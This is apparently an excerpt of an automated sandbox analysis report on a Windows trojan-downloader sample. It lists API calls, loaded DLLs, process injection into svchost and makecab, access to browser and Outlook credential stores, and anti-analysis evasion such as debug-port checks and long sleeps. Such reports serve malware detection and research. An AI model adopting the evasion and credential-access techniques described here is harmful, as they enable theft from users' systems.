            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008EB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008FF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008F86D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_00884FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | File created: C:\Users\user\AppData\Local\Temp\aut8C0D.tmp
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: makecab.exe, 00000006.00000002.4099520220.00000000029A4000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.2165763164.00000000029A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | ReversingLabs: Detection: 36%
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Virustotal: Detection: 29%
            Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe"
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | Process created: C:\Windows\SysWOW64\makecab.exe "C:\Windows\SysWOW64\makecab.exe"
            Source: C:\Windows\SysWOW64\makecab.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe"
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | Process created: C:\Windows\SysWOW64\makecab.exe "C:\Windows\SysWOW64\makecab.exe"
            Source: C:\Windows\SysWOW64\makecab.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: cabinet.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\makecab.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\makecab.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Static file information: File size 1179136 > 1048576
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: makecab.pdbGCTL source: svchost.exe, 00000001.00000003.1952888154.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1952748219.000000000322C000.00000004.00000020.00020000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000005.00000002.4100007794.0000000000C48000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rULxYvbAFLatPN.exe, 00000005.00000000.1905502256.00000000002BE000.00000002.00000001.01000000.00000005.sdmp, rULxYvbAFLatPN.exe, 00000007.00000000.2054148696.00000000002BE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, 00000000.00000003.1658047056.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, 00000000.00000003.1656804826.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1984342146.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1890105998.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1984342146.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1891740698.0000000003600000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.1986389110.00000000044F0000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.1984146113.0000000004346000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.4101017496.000000000483E000.00000040.00001000.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.4101017496.00000000046A0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, 00000000.00000003.1658047056.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, 00000000.00000003.1656804826.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1984342146.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1890105998.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1984342146.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1891740698.0000000003600000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, makecab.exe, 00000006.00000003.1986389110.00000000044F0000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.1984146113.0000000004346000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.4101017496.000000000483E000.00000040.00001000.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.4101017496.00000000046A0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: makecab.pdb source: svchost.exe, 00000001.00000003.1952888154.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1952748219.000000000322C000.00000004.00000020.00020000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000005.00000002.4100007794.0000000000C48000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: makecab.exe, 00000006.00000002.4099520220.0000000002923000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.4101618826.0000000004CCC000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.000000000281C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2273797702.00000000237AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: makecab.exe, 00000006.00000002.4099520220.0000000002923000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.4101618826.0000000004CCC000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.000000000281C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2273797702.00000000237AC000.00000004.80000000.00040000.00000000.sdmp
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008FC304 LoadLibraryA,GetProcAddress
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008E8719 push FFFFFF8Bh; iretd 0_2_008E871B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008AE94F push edi; ret 0_2_008AE951
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008AEA68 push esi; ret 0_2_008AEA6A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008A8B85 push ecx; ret 0_2_008A8B98
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008AEC43 push esi; ret 0_2_008AEC45
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008AED2C push edi; ret 0_2_008AED2E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00414072 push 11A0082Fh; ret 1_2_00414077
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402031 push ebx; iretd 1_2_00402032
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004168C4 push eax; iretd 1_2_004168CA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004018DA push edx; ret 1_2_004018E7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040229D push ebx; iretd 1_2_004022A1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041432E push 0000001Ch; retf 1_2_00414332
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00412461 push es; retf 1_2_0041248A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00412413 push es; retf 1_2_0041248A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00413CD5 push es; retf 1_2_00413D54
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00413CE1 push es; retf 1_2_00413D54
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00413C86 push es; retf 1_2_00413D54
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00403540 push eax; ret 1_2_00403542
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00413D55 push es; retf 1_2_00413D54
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004075D2 push eax; retf 1_2_004075D3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00413D84 push es; retf 1_2_00413D54
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00404DA7 push ebx; iretd 1_2_00404DA8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004125B3 push ss; ret 1_2_004125C7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00401ED6 push ss; retf 1_2_00401EF1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00401EBA push ebx; iretd 1_2_00401EBB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00401795 push ebx; iretd 1_2_00401797
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0380225F pushad ; ret 1_2_038027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038027FA pushad ; ret 1_2_038027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038309AD push ecx; mov dword ptr [esp], ecx 1_2_038309B6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0380283D push eax; iretd 1_2_03802858
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03801368 push eax; iretd 1_2_03801369
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_00884A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_009055FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008A33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\makecab.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\makecab.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\makecab.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\makecab.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\makecab.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe API/Special instruction interceptor: Address: 1103274
            Source: C:\Windows\SysWOW64\makecab.exe API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\makecab.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\makecab.exe API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\makecab.exe API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\makecab.exe API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\makecab.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\makecab.exe API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\makecab.exe API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0387096E rdtsc 1_2_0387096E
            Source: C:\Windows\SysWOW64\makecab.exe Window / User API: threadDelayed 9843
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-100079
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe API coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.6 %
            Source: C:\Windows\SysWOW64\makecab.exe API coverage: 2.6 %
            Source: C:\Windows\SysWOW64\makecab.exe TID: 7704 Thread sleep count: 128 > 30
            Source: C:\Windows\SysWOW64\makecab.exe TID: 7704 Thread sleep time: -256000s >= -30000s
            Source: C:\Windows\SysWOW64\makecab.exe TID: 7704 Thread sleep count: 9843 > 30
            Source: C:\Windows\SysWOW64\makecab.exe TID: 7704 Thread sleep time: -19686000s >= -30000s
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe TID: 7716 Thread sleep time: -80000s >= -30000s
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe TID: 7716 Thread sleep time: -41000s >= -30000s
            Source: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe TID: 7716 Thread sleep time: -55500s >= -30000s
            Source: C:\Windows\SysWOW64\makecab.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\makecab.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe Code function: 0_2_008E4696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_008E4696
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe Code function: 0_2_008EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_008EC9C7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe Code function: 0_2_008EC93C FindFirstFileW,FindClose, 0_2_008EC93C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe Code function: 0_2_008EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_008EF200
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe Code function: 0_2_008EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_008EF35D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe Code function: 0_2_008EF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_008EF65E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe Code function: 0_2_008E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_008E3A2B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe Code function: 0_2_008E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_008E3D4E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe Code function: 0_2_008EBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_008EBF27
            Source: C:\Windows\SysWOW64\makecab.exe Code function: 6_2_0282BEF0 FindFirstFileW,FindNextFileW,FindClose, 6_2_0282BEF0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe Code function: 0_2_00884AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00884AFE
            Source: makecab.exe, 00000006.00000002.4099520220.0000000002923000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2275131882.0000027CE36AC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: rULxYvbAFLatPN.exe, 00000007.00000002.4100135387.0000000000839000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe API call chain: ExitProcess graph end node graph_0-98811
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\makecab.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0387096E rdtsc 1_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00417A63 LdrLoadDll, 1_2_00417A63
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe Code function: 0_2_008F41FD BlockInput, 0_2_008F41FD
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe Code function: 0_2_00883B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00883B4C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe Code function: 0_2_008B5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_008B5CCC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe Code function: 0_2_008FC304 LoadLibraryA,GetProcAddress, 0_2_008FC304
